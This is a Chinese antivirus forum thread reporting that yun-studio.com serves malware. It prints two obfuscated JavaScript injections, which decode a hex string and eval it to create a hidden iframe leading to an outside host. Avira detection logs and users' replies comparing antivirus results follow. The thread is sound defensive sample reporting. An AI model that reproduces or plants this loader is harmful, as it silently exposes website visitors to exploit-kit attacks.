查看: 4051|回复: 20
收起左侧

[已鉴定] http://yun-studio.com/

[复制链接]
fireold
发表于 2013-9-20 09:26:59 | 显示全部楼层 |阅读模式

  1. /*0c0896*/
  2. ps = "split";
  3. e = eval;
  4. v = "0x";
  5. a = 0;
  6. z = "y";
  7. try {
  8.     a *= 25
  9. } catch (zz) {
  10.     a = 1
  11. }
  12. if (!a) {
  13.     try {
  14.         --e("doc" + "ument")["\x62od" + z]
  15.     } catch (q) {
  16.         a2 = "_";
  17.         sa = 0xa - 02;
  18.     }
  19.     z = "28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_7c_6f_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7c_6f_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_69_71_6b_77_74_74_6d_6f_6d_36_76_6d_7c_37_6b_77_76_6f_77_35_7a_71_7e_6d_7a_35_7c_77_7d_75_69_76_71_37_6b_74_73_36_78_70_78_2f_43_15_12_28_7c_6f_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_77_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7c_6f_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2f_38_2f_43_15_12_28_7c_6f_36_7b_7c_81_74_6d_36_70_6d_71_6f_70_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7c_6f_36_7b_7c_81_74_6d_36_7f_71_6c_7c_70_28_45_28_2f_39_78_80_2f_43_15_12_28_7c_6f_36_7b_7c_81_74_6d_36_74_6d_6e_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_7c_6f_36_7b_7c_81_74_6d_36_7c_77_78_28_45_28_2f_39_78_80_2f_43_15_12_15_12_28_71_6e_28_30_29_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7c_6f_2f_31_31_28_83_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_7f_7a_71_7c_6d_30_2f_44_6c_71_7e_28_71_6c_45_64_2f_7c_6f_64_2f_46_44_37_6c_71_7e_46_2f_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_7c_6f_2f_31_36_69_78_78_6d_76_6c_4b_70_71_74_6c_30_7c_6f_31_43_15_12_28_85_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_5b_6d_7c_4b_77_77_73_71_6d_30_6b_77_77_73_71_6d_56_69_75_6d_34_6b_77_77_73_71_6d_5e_69_74_7d_6d_34_76_4c_69_81_7b_34_78_69_7c_70_31_28_83_15_12_28_7e_69_7a_28_7c_77_6c_69_81_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_7e_69_7a_28_6d_80_78_71_7a_6d_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_71_6e_28_30_76_4c_69_81_7b_45_45_76_7d_74_74_28_84_84_28_76_4c_69_81_7b_45_45_38_31_28_76_4c_69_81_7b_45_39_43_15_12_28_6d_80_78_71_7a_6d_36_7b_6d_7c_5c_71_75_6d_30_7c_77_6c_69_81_36_6f_6d_7c_5c_71_75_6d_30_31_28_33_28_3b_3e_38_38_38_38_38_32_3a_3c_32_76_4c_69_81_7b_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_28_45_28_6b_77_77_73_71_6d_56_69_75_6d_33_2a_45_2a_33_6d_7b_6b_69_78_6d_30_6b_77_77_73_71_6d_5e_69_74_7d_6d_31_15_12_28_33_28_2a_43_6d_80_78_71_7a_6d_7b_45_2a_28_33_28_6d_80_78_71_7a_6d_36_7c_77_4f_55_5c_5b_7c_7a_71_76_6f_30_31_28_33_28_30_30_78_69_7c_70_31_28_47_28_2a_43_28_78_69_7c_70_45_2a_28_33_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_74_6d_76_6f_7c_70_43_15_12_28_7a_6d_7c_7d_7a_76_28_7d_76_6d_7b_6b_69_78_6d_30_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_74_6d_76_34_28_6d_76_6c_28_31_28_31_43_15_12_85_15_12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12" [ps](a2);
  20.     za = "";
  21.     for (i = 0; i < z.length; i++) {
  22.         za += String["fromCharCode"](e(v + (z[i])) - sa);
  23.     }
  24.     zaz = za;
  25.     e(zaz);
  26. } /*/0c0896*/


  27. /*d68107*/
  28. z = "y";
  29. vz = "d" + "o" + "c" + "ument";
  30. try {
  31.     +
  32.     function() {
  33.         ++(window[vz].body) == null
  34.     }()
  35. } catch (q) {
  36.     aa = function(ff) {
  37.         ff = "fr" + "omCh" + ff;
  38.         for (i = 0; i < z.length; i++) {
  39.             za += String[ff](e(v + (z[i])) - (13));
  40.         }
  41.     };
  42. };
  43. e = (eval);
  44. v = "0x";
  45. a = 0;
  46. try {;
  47. } catch (zz) {
  48.     a = 1
  49. }
  50. if (!a) {
  51.     try {
  52.         ++e(vz)["\x62o" + "d" + z]
  53.     } catch (q) {
  54.         a2 = "^";
  55.     }
  56.     z = "2d^73^82^7b^70^81^76^7c^7b^2d^7b^7c^80^6f^6f^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^75^7d^34^48^1a^17^2d^83^6e^7f^2d^7b^7c^80^6f^6f^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7f^72^6e^81^72^52^79^72^7a^72^7b^81^35^34^76^73^7f^6e^7a^72^34^36^48^1a^17^1a^17^2d^7b^7c^80^6f^6f^3b^80^7f^70^2d^4a^2d^34^75^81^81^7d^47^3c^3c^7c^7f^82^7b^6e^3b^70^7c^3b^82^78^3c^84^7d^3a^6e^71^7a^76^7b^3c^44^46^81^58^83^63^64^70^3b^7d^75^7d^34^48^1a^17^2d^7b^7c^80^6f^6f^3b^80^81^86^79^72^3b^7d^7c^80^76^81^76^7c^7b^2d^4a^2d^34^6e^6f^80^7c^79^82^81^72^34^48^1a^17^2d^7b^7c^80^6f^6f^3b^80^81^86^79^72^3b^70^7c^79^7c^7f^2d^4a^2d^34^46^3d^3e^44^34^48^1a^17^2d^7b^7c^80^6f^6f^3b^80^81^86^79^72^3b^75^72^76^74^75^81^2d^4a^2d^34^46^3d^3e^44^7d^85^34^48^1a^17^2d^7b^7c^80^6f^6f^3b^80^81^86^79^72^3b^84^76^71^81^75^2d^4a^2d^34^46^3d^3e^44^7d^85^34^48^1a^17^2d^7b^7c^80^6f^6f^3b^80^81^86^79^72^3b^79^72^73^81^2d^4a^2d^34^3e^3d^3d^3d^46^3d^3e^44^34^48^1a^17^2d^7b^7c^80^6f^6f^3b^80^81^86^79^72^3b^81^7c^7d^2d^4a^2d^34^3e^3d^3d^3d^46^3d^3e^44^34^48^1a^17^1a^17^2d^76^73^2d^35^2e^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7b^7c^80^6f^6f^34^36^36^2d^88^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^84^7f^76^81^72^35^34^49^7d^2d^76^71^4a^69^34^7b^7c^80^6f^6f^69^34^2d^70^79^6e^80^80^4a^69^34^7b^7c^80^6f^6f^3d^46^69^34^2d^4b^49^3c^7d^4b^34^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7b^7c^80^6f^6f^34^36^3b^6e^7d^7d^72^7b^71^50^75^76^79^71^35^7b^7c^80^6f^6f^36^48^1a^17^2d^8a^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^60^72^81^50^7c^7c^78^76^72^35^70^7c^7c^78^76^72^5b^6e^7a^72^39^70^7c^7c^78^76^72^63^6e^79^82^72^39^7b^51^6e^86^80^39^7d^6e^81^75^36^2d^88^1a^17^2d^83^6e^7f^2d^81^7c^71^6e^86^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^83^6e^7f^2d^72^85^7d^76^7f^72^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^76^73^2d^35^7b^51^6e^86^80^4a^4a^7b^82^79^79^2d^89^89^2d^7b^51^6e^86^80^4a^4a^3d^36^2d^7b^51^6e^86^80^4a^3e^48^1a^17^2d^72^85^7d^76^7f^72^3b^80^72^81^61^76^7a^72^35^81^7c^71^6e^86^3b^74^72^81^61^76^7a^72^35^36^2d^38^2d^40^43^3d^3d^3d^3d^3d^37^3f^41^37^7b^51^6e^86^80^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^2d^4a^2d^70^7c^7c^78^76^72^5b^6e^7a^72^38^2f^4a^2f^38^72^80^70^6e^7d^72^35^70^7c^7c^78^76^72^63^6e^79^82^72^36^1a^17^2d^38^2d^2f^48^72^85^7d^76^7f^72^80^4a^2f^2d^38^2d^72^85^7d^76^7f^72^3b^81^7c^54^5a^61^60^81^7f^76^7b^74^35^36^2d^38^2d^35^35^7d^6e^81^75^36^2d^4c^2d^2f^48^2d^7d^6e^81^75^4a^2f^2d^38^2d^7d^6e^81^75^2d^47^2d^2f^2f^36^48^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^54^72^81^50^7c^7c^78^76^72^35^2d^7b^6e^7a^72^2d^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^7f^81^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^7b^6e^7a^72^2d^38^2d^2f^4a^2f^2d^36^48^1a^17^2d^83^6e^7f^2d^79^72^7b^2d^4a^2d^80^81^6e^7f^81^2d^38^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^38^2d^3e^48^1a^17^2d^76^73^2d^35^2d^35^2d^2e^80^81^6e^7f^81^2d^36^2d^33^33^1a^17^2d^35^2d^7b^6e^7a^72^2d^2e^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^3d^39^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^36^2d^36^2d^36^1a^17^2d^88^1a^17^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^8a^1a^17^2d^76^73^2d^35^2d^80^81^6e^7f^81^2d^4a^4a^2d^3a^3e^2d^36^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^83^6e^7f^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^2f^48^2f^39^2d^79^72^7b^2d^36^48^1a^17^2d^76^73^2d^35^2d^72^7b^71^2d^4a^4a^2d^3a^3e^2d^36^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^79^72^7b^74^81^75^48^1a^17^2d^7f^72^81^82^7f^7b^2d^82^7b^72^80^70^6e^7d^72^35^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7b^7c^80^6f^6f^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);
  57.     za = "";
  58.     aa("arCode");
  59.     e("" + za);
  60. } /*/d68107*/
复制代码



Avira
2013/9/20 上午 09:24 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\yun-studio_com[1].htm'
      包含病毒或有害的程式 'JS/Blacole.EH.1' [virus]
      已採取動作:
      檔案會移動至 '57f8065f.qua' 名稱底下的隔離區目錄。.

2013/9/20 上午 09:24 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        780
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/9/20 上午 09:23 [Web Protection] 發現惡意程式碼
      從 URL "http://yun-studio.com/styles/images/content-bg.gif" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過

2013/9/20 上午 09:23 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\mootools.v1.11[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/20 上午 09:23 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\yunstudio_v1[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/20 上午 09:23 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\yunstudio_v1[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/9/20 上午 09:23 [Web Protection] 發現惡意程式碼
      從 URL "http://yun-studio.com/scripts/yunstudio_v1.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/9/20 上午 09:23 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\mootools.v1.11[1].js 中
      偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
      執行的動作:拒絕存取

2013/9/20 上午 09:23 [Web Protection] 發現惡意程式碼
      從 URL "http://yun-studio.com/scripts/mootools.v1.11.js" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
      已採取動作:已略過

2013/9/20 上午 09:23 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\yun-studio_com[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:傳輸至掃描程式

2013/9/20 上午 09:23 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\1YP0JPM6\yun-studio_com[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.EH.1 [virus]'
      執行的動作:拒絕存取

2013/9/20 上午 09:23 [Web Protection] 發現惡意程式碼
      從 URL "http://yun-studio.com/" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.EH.1' [virus]。
      已採取動作:已略過


av9.jpg



fs9.jpg
墨家小子
发表于 2013-9-20 13:28:02 | 显示全部楼层
SCEP 不报
fireold
 楼主| 发表于 2013-9-20 13:33:11 | 显示全部楼层
墨家小子 发表于 2013-9-20 13:28
SCEP 不报

那把它換掉囉!
墨家小子
发表于 2013-9-20 13:34:02 | 显示全部楼层
fireold 发表于 2013-9-20 13:33
那把它換掉囉!

你再进去看看是不是误报
fireold
 楼主| 发表于 2013-9-20 13:42:00 | 显示全部楼层
墨家小子 发表于 2013-9-20 13:34
你再进去看看是不是误报

卡巴斯基 2014

k.jpg
墨家小子
发表于 2013-9-20 13:44:28 | 显示全部楼层
我去上报
fireold
 楼主| 发表于 2013-9-20 14:13:42 | 显示全部楼层
墨家小子 发表于 2013-9-20 13:34
你再进去看看是不是误报

再補一個

gd.jpg
墨家小子
发表于 2013-9-20 14:15:30 | 显示全部楼层
fireold 发表于 2013-9-20 14:13
再補一個

FS跟GD用的都是BD的 换一个不是BD的再说
fireold
 楼主| 发表于 2013-9-20 14:31:14 | 显示全部楼层
墨家小子 发表于 2013-9-20 14:15
FS跟GD用的都是BD的 换一个不是BD的再说

那這個如何呢…


n.jpg
墨家小子
发表于 2013-9-20 14:35:03 | 显示全部楼层
fireold 发表于 2013-9-20 14:31
那這個如何呢…

太刺激啦
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-24 13:23 , Processed in 0.142385 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表